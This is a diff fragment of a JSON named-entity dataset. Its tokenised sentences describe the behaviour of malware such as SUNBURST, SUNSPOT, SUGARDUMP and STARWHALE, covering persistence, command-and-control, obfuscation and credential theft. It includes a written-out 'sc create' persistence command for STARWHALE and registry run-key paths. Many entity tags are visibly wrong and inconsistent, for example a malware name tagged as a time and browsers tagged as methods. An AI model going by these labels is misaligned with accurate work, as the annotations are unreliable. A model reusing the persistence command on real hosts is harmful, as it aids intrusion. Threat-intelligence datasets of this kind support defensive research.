"B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SPACESHIP", + "achieves", + "persistence", + "by", + "creating", + "a", + "shortcut", + "in", + "the", + "current", + "user's", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "has", + "used", + "a", + "character", + "insertion", + "obfuscation", + "technique,", + "making", + "the", + "script", + "appear", + "to", + "contain", + "Chinese", + "characters." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "has", + "scripts", + "that", + "are", + "responsible", + "for", + "deobfuscating", + "additional", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "has", + "used", + "been", + "observed", + "deleting", + "scripts", + "once", + "used." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "can", + "make", + "a", + "direct", + "SQL", + "connection", + "to", + "a", + "Microsoft", + "database", + "controlled", + "by", + "the", + "attackers,", + "retrieve", + "an", + "item", + "from", + "the", + "bindata", + "table,", + "then", + "write", + "and", + "execute", + "the", + "file", + "on", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "relies", + "on", + "users", + "clicking", + "on", + "an", + "embedded", + "image", + "to", + "execute", + "the", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "has", + "used", + "PowerShell", + "to", + "create", + "a", + "Meterpreter", + "session." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "has", + "created", + "scheduled", + "tasks", + "in", + "<code>%appdata%\\Roaming\\Microsoft\\Templates\\</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SQLRat", + "has", + "used", + "SQL", + "to", + "execute", + "JavaScript", + "and", + "VB", + "scripts", + "on", + "the", + "host", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "can", + "collect", + "data", + "from", + "an", + "infected", + "local", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "been", + "obfuscated", + "with", + "hex-encoded", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "can", + "exfiltrate", + "collected", + "data", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "stored", + "collected", + "data", + "in", + "a", + "file", + "called", + "`stari.txt`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "relied", + "on", + "victims", + "opening", + "a", + "malicious", + "Excel", + "file", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "can", + "establish", + "persistence", + "by", + "installing", + "itself", + "in", + "the", + "startup", + "folder,", + "whereas", + "the", + "GO", + "variant", + "has", + "created", + "a", + "`HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM`", + "registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "the", + "ability", + "to", + "hex-encode", + "collected", + "data", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "can", + "gather", + "the", + "computer", + "name", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "the", + "ability", + "to", + "collect", + "the", + "IP", + "address", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "can", + "gather", + "the", + "username", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "can", + "use", + "the", + "VBScript", + "function", + "`GetRef`", + "as", + "part", + "of", + "its", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "the", + "ability", + "to", + "contact", + "actor-controlled", + "C2", + "servers", + "via", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "the", + "ability", + "to", + "execute", + "commands", + "via", + "`cmd.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "STARWHALE", + "has", + "the", + "ability", + "to", + "create", + "the", + "following", + "Windows", + "service", + "to", + "establish", + "persistence", + "on", + "an", + "infected", + "host:", + "`sc", + "create", + "Windowscarpstss", + "binpath=", + "\"cmd.exe", + "/c", + "cscript.exe", + "c:\\\\windows\\\\system32\\\\w7_1.wsf", + "humpback_whale\"", + "start=", + "\"auto\"", + "obj=", + "\"LocalSystem\"`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STEADYPULSE", + "can", + "URL", + "decode", + "key/value", + "pairs", + "sent", + "over", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STEADYPULSE", + "can", + "add", + "lines", + "to", + "a", + "Perl", + "script", + "on", + "a", + "targeted", + "server", + "to", + "import", + "additional", + "Perl", + "modules." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "STEADYPULSE", + "can", + "transmit", + "URL", + "encoded", + "data", + "over", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STEADYPULSE", + "can", + "parse", + "web", + "requests", + "made", + "to", + "a", + "targeted", + "server", + "to", + "determine", + "the", + "next", + "stage", + "of", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "STEADYPULSE", + "is", + "a", + "web", + "shell", + "that", + "can", + "enable", + "the", + "execution", + "of", + "arbitrary", + "commands", + "on", + "compromised", + "web", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "has", + "encrypted", + "collected", + "data", + "using", + "AES", + "CBC", + "mode", + "and", + "encoded", + "it", + "using", + "Base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "has", + "collected", + "browser", + "bookmark", + "and", + "history", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "variants", + "have", + "harvested", + "credentials", + "from", + "browsers", + "such", + "as", + "Firefox,", + "Chrome,", + "Opera,", + "and", + "Edge." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "has", + "sent", + "stolen", + "credentials", + "and", + "other", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "can", + "search", + "for", + "and", + "collect", + "data", + "from", + "specific", + "Chrome,", + "Opera,", + "Microsoft", + "Edge,", + "and", + "Firefox", + "files,", + "including", + "any", + "folders", + "that", + "have", + "the", + "string", + "`Profile`", + "in", + "its", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "has", + "stored", + "collected", + "data", + "under", + "`%<malware_execution_folder>%\\\\CrashLog.txt`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "A", + "SUGARDUMP", + "variant", + "used", + "SMTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "SUGARDUMP", + "variants", + "required", + "a", + "user", + "to", + "enable", + "a", + "macro", + "within", + "a", + "malicious", + ".xls", + "file", + "for", + "execution." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP's", + "scheduled", + "task", + "has", + "been", + "named", + "`MicrosoftInternetExplorerCrashRepoeterTaskMachineUA`", + "or", + "`MicrosoftEdgeCrashRepoeterTaskMachineUA`,", + "depending", + "on", + "the", + "Windows", + "OS", + "version." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "has", + "been", + "named", + "`CrashReporter.exe`", + "to", + "appear", + "as", + "a", + "legitimate", + "Mozilla", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "has", + "created", + "scheduled", + "tasks", + "called", + "`MicrosoftInternetExplorerCrashRepoeterTaskMachineUA`", + "and", + "`MicrosoftEdgeCrashRepoeterTaskMachineUA`,", + "which", + "were", + "configured", + "to", + "execute", + "`CrashReporter.exe`", + "during", + "user", + "logon." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARDUMP", + "can", + "identify", + "Chrome,", + "Opera,", + "Edge", + "Chromium,", + "and", + "Firefox", + "browsers,", + "including", + "version", + "number,", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "SUGARDUMP", + "variant", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARUSH", + "has", + "checked", + "for", + "internet", + "connectivity", + "from", + "an", + "infected", + "host", + "before", + "attempting", + "to", + "establish", + "a", + "new", + "TCP", + "connection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARUSH", + "has", + "used", + "TCP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARUSH", + "has", + "used", + "port", + "4585", + "for", + "a", + "TCP", + "connection", + "to", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARUSH", + "has", + "used", + "`cmd`", + "for", + "execution", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUGARUSH", + "has", + "created", + "a", + "service", + "named", + "`Service1`", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "also", + "removed", + "the", + "firewall", + "rules", + "it", + "created", + "during", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "removed", + "IFEO", + "registry", + "values", + "to", + "clean", + "up", + "traces", + "of", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "was", + "digitally", + "signed", + "by", + "SolarWinds", + "from", + "March", + "-", + "May", + "2020." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "I-Time", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "used", + "DNS", + "for", + "C2", + "traffic", + "designed", + "to", + "mimic", + "normal", + "SolarWinds", + "API", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "attempted", + "to", + "disable", + "software", + "security", + "services", + "following", + "checks", + "against", + "a", + "FNV-1a", + "+", + "XOR", + "hashed", + "hardcoded", + "blocklist." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "dynamically", + "resolved", + "C2", + "infrastructure", + "for", + "randomly-generated", + "subdomains", + "within", + "a", + "parent", + "domain." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "had", + "a", + "command", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "had", + "commands", + "to", + "enumerate", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "created", + "an", + "Image", + "File", + "Execution", + "Options", + "(IFEO)", + "Debugger", + "registry", + "value", + "for", + "the", + "process", + "<code>dllhost.exe</code>", + "to", + "trigger", + "the", + "installation", + "of", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SUNBURST", + "removed", + "HTTP", + "proxy", + "registry", + "values", + "to", + "clean", + "up", + "traces", + "of", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "source", + "code", + "used", + "generic", + "variable", + "names", + "and", + "pre-obfuscated", + "strings,", + "and", + "was", + "likely", + "sanitized", + "of", + "developer", + "comments", + "before", + "being", + "added", + "to", + "SUNSPOT." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SUNBURST", + "delivered", + "different", + "payloads,", + "including", + "TEARDROP", + "in", + "at", + "least", + "one", + "instance." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "added", + "junk", + "bytes", + "to", + "its", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SUNBURST", + "created", + "VBScripts", + "that", + "were", + "named", + "after", + "existing", + "services", + "or", + "folders", + "to", + "blend", + "into", + "legitimate", + "activities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "had", + "commands", + "that", + "allow", + "an", + "attacker", + "to", + "write", + "or", + "delete", + "registry", + "keys,", + "and", + "was", + "observed", + "stopping", + "services", + "by", + "setting", + "their", + "<code>HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start</code>", + "registry", + "entries", + "to", + "value", + "4.", + "It", + "also", + "deleted", + "previously-created", + "Image", + "File", + "Execution", + "Options", + "(IFEO)", + "Debugger", + "registry", + "values", + "and", + "registry", + "keys", + "related", + "to", + "HTTP", + "proxy", + "to", + "clean", + "up", + "traces", + "of", + "its", + "activity." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "SUNBURST", + "strings", + "were", + "compressed", + "and", + "encoded", + "in", + "Base64.", + "SUNBURST", + "also", + "obfuscated", + "collected", + "system", + "information", + "using", + "a", + "FNV-1a", + "+", + "XOR", + "algorithm." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "a", + "list", + "of", + "process", + "names", + "that", + "were", + "hashed", + "using", + "a", + "FNV-1a", + "+", + "XOR", + "algorithm", + "to", + "check", + "against", + "similarly-hashed", + "hardcoded", + "blocklists." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "masqueraded", + "its", + "network", + "traffic", + "as", + "the", + "Orion", + "Improvement", + "Program", + "(OIP)", + "protocol." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "the", + "registry", + "value", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid</code>", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "used", + "Rundll32", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "checked", + "for", + "a", + "variety", + "of", + "antivirus/endpoint", + "detection", + "agents", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "used", + "Base64", + "encoding", + "in", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "C2", + "data", + "attempted", + "to", + "appear", + "as", + "benign", + "XML", + "related", + "to", + ".NET", + "assemblies", + "or", + "as", + "a", + "faux", + "JSON", + "blob." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SUNBURST", + "encrypted", + "C2", + "traffic", + "using", + "a", + "single-byte-XOR", + "cipher." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "checked", + "the", + "domain", + "name", + "of", + "the", + "compromised", + "host", + "to", + "verify", + "it", + "was", + "running", + "in", + "a", + "real", + "environment." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "hostname", + "and", + "OS", + "version." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "all", + "network", + "interface", + "MAC", + "addresses", + "that", + "are", + "up", + "and", + "not", + "loopback", + "devices,", + "as", + "well", + "as", + "IP", + "address,", + "DHCP", + "configuration,", + "and", + "domain", + "information." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "a", + "list", + "of", + "service", + "names", + "that", + "were", + "hashed", + "using", + "a", + "FNV-1a", + "+", + "XOR", + "algorithm", + "to", + "check", + "against", + "similarly-hashed", + "hardcoded", + "blocklists." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "collected", + "device", + "`UPTIME`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SUNBURST", + "remained", + "dormant", + "after", + "initial", + "access", + "for", + "a", + "period", + "of", + "up", + "to", + "two", + "weeks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "used", + "VBScripts", + "to", + "initiate", + "the", + "execution", + "of", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "communicated", + "via", + "HTTP", + "GET", + "or", + "HTTP", + "POST", + "requests", + "to", + "third", + "party", + "servers", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNBURST", + "used", + "the", + "WMI", + "query", + "<code>Select", + "*", + "From", + "Win32_SystemDriver</code>", + "to", + "retrieve", + "a", + "driver", + "listing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "modified", + "its", + "security", + "token", + "to", + "grants", + "itself", + "debugging", + "privileges", + "by", + "adding", + "<code>SeDebugPrivilege</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "malware", + "was", + "designed", + "and", + "used", + "to", + "insert", + "SUNBURST", + "into", + "software", + "builds", + "of", + "the", + "SolarWinds", + "Orion", + "IT", + "management", + "product." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "decrypts", + "SUNBURST,", + "which", + "was", + "stored", + "in", + "AES128-CBC", + "encrypted", + "blobs." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "only", + "replaces", + "SolarWinds", + "Orion", + "source", + "code", + "if", + "the", + "MD5", + "checksums", + "of", + "both", + "the", + "original", + "source", + "code", + "file", + "and", + "backdoored", + "replacement", + "source", + "code", + "match", + "hardcoded", + "values." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Following", + "the", + "successful", + "injection", + "of", + "SUNBURST,", + "SUNSPOT", + "deleted", + "a", + "temporary", + "file", + "it", + "created", + "named", + "<code>InventoryManager.bk</code>", + "after", + "restoring", + "the", + "original", + "SolarWinds", + "Orion", + "source", + "code", + "to", + "the", + "software", + "library." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "enumerated", + "the", + "Orion", + "software", + "Visual", + "Studio", + "solution", + "directory", + "path." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "was", + "identified", + "on", + "disk", + "with", + "a", + "filename", + "of", + "<code>taskhostsvc.exe</code>", + "and", + "it", + "created", + "an", + "encrypted", + "log", + "file", + "at", + "<code>C:\\Windows\\Temp\\vmware-vmdmp.log</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 